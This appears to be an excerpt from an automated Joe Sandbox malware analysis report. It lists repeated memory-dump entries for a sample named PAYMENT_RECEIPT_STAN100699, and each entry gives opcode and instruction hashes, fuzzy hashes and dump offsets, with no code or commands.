                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 991426e68f66702e4a22de084a266616e0dcc3071fd3ea932444e66a914c6fba
                                  • Instruction ID: 9fc5f509ecd05197b29f7c960b986284ea5301372694b7c2959ea56bc7fed499
                                  • Opcode Fuzzy Hash: 991426e68f66702e4a22de084a266616e0dcc3071fd3ea932444e66a914c6fba
                                  • Instruction Fuzzy Hash: 20E09A71955388AFC762CFB4A81869EBBF4AF4B215B1001EAC089DB162E7304E04CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 094ac1e5088ea8766db9e0588b7af001e6c7758ea1e2aa213957449cd70e4f12
                                  • Instruction ID: 3742a42f8b110f8fc726ead888e7b006c460e3e3eec1bfe31d688feff919bea2
                                  • Opcode Fuzzy Hash: 094ac1e5088ea8766db9e0588b7af001e6c7758ea1e2aa213957449cd70e4f12
                                  • Instruction Fuzzy Hash: A9E0DFB2C89288AFCB52DBB4A4146AD7FF4AF47300F1045EAC1459B161EB324E02DB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a79402cc219bb4883f99f747afb1a6b07aea17a02744c6cf26dc3ce8305d66b3
                                  • Instruction ID: 11bba77bd084dcf1bd844049b4544a40c3f003da245b9b1688d5d14673625ce0
                                  • Opcode Fuzzy Hash: a79402cc219bb4883f99f747afb1a6b07aea17a02744c6cf26dc3ce8305d66b3
                                  • Instruction Fuzzy Hash: ACE09270909284DFCB15CBA4E45159CBFB0EF97308F2481EEC8446B262C7724D17CB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 741d7a22b356e9b8bb099329bfa65546f7eedfbdd013900a4b302b77b9d422ed
                                  • Instruction ID: 5f1f5e80e2b07504a238c62fbd3f0e45de64c7aca86ca8f6c3a56c925bd8a735
                                  • Opcode Fuzzy Hash: 741d7a22b356e9b8bb099329bfa65546f7eedfbdd013900a4b302b77b9d422ed
                                  • Instruction Fuzzy Hash: 3AE0C2B0D60248AFCB95DFA8D458A98BBB0AB19214F1041EAD904D7361E7309A44CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 065215875557f66e5652bb2f6788edf068243888c588ae356fbc4355b6679d0f
                                  • Instruction ID: 7fbe2f1cdbdcaa80196f82596b2b9334075e60c0b28d4f760b573f3ddfc7364f
                                  • Opcode Fuzzy Hash: 065215875557f66e5652bb2f6788edf068243888c588ae356fbc4355b6679d0f
                                  • Instruction Fuzzy Hash: 21E0C274E00208AFCB84DFA8D544A9CBBF4EB48304F10C1AA9918A7340D732AA51DF84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd78a42831ad491a297a32732c1c9a31317ecd1afd6ad9ff0f88a516284060ef
                                  • Instruction ID: 1613769f4fcbce5aba66eef9b0ddebf6f75efe809af0064f0d0b06a2e0afb587
                                  • Opcode Fuzzy Hash: dd78a42831ad491a297a32732c1c9a31317ecd1afd6ad9ff0f88a516284060ef
                                  • Instruction Fuzzy Hash: FCD0177284120CABCB51EBA5D404A9EBBE9AB46204F5085A99609AB150EB725E009BD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8419ec3dea9d551a0c408a7544f3a4acd418a2ef8ebcddd4969abd78e5855d9c
                                  • Instruction ID: 41caf0f4b5389f615cbf290dafaaeaaff036ff6dd2c21a6b05e710f8463783c3
                                  • Opcode Fuzzy Hash: 8419ec3dea9d551a0c408a7544f3a4acd418a2ef8ebcddd4969abd78e5855d9c
                                  • Instruction Fuzzy Hash: 94D01771911208EFCB11EFB5E408A9ABBF8EB0A20AF5046A595099B150EB718E049BD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e4c6fbc64931bbf01e7ac6363bf8170446da51d2b4b25880564e90087009d2bb
                                  • Instruction ID: b76b7f93520c2f0850d28db9e51072b825c168e78626a487e60c4f147dc49779
                                  • Opcode Fuzzy Hash: e4c6fbc64931bbf01e7ac6363bf8170446da51d2b4b25880564e90087009d2bb
                                  • Instruction Fuzzy Hash: 64E01274904208EBC704DF94E54595DBBB4EB45304F50C1DDCD0467350C7325E42DB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'q
                                  • API String ID: 0-1807707664
                                  • Opcode ID: 20b55842ddd2304b00f69f97623749ff7b313b4d4294743228aa50d38c2cf942
                                  • Instruction ID: d377b398b1ec3edf7ebf0bd2ceff3ee69e3b61d0a217aa6ee0a781a71459214f
                                  • Opcode Fuzzy Hash: 20b55842ddd2304b00f69f97623749ff7b313b4d4294743228aa50d38c2cf942
                                  • Instruction Fuzzy Hash: 8961D774E00245DFDB58EF6AF84469ABBF2FBC8204F14C529D408EB269EB785D068F51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'q
                                  • API String ID: 0-1807707664
                                  • Opcode ID: 45a070d5d04f509629f2dc07bfdc55cd70ca4528264934bf0a02d3cb89bb2ba6
                                  • Instruction ID: de940319884b71af38702e52ca16a2f92fc5ca98223451f626ea876c3cdcb85c
                                  • Opcode Fuzzy Hash: 45a070d5d04f509629f2dc07bfdc55cd70ca4528264934bf0a02d3cb89bb2ba6
                                  • Instruction Fuzzy Hash: 4861D874E00245CFDB58EF6AF84469ABBF2FBC8204F14C529D408EB258EB785D068F51
                                  Uniqueness

                                  Uniqueness Score: -1.00%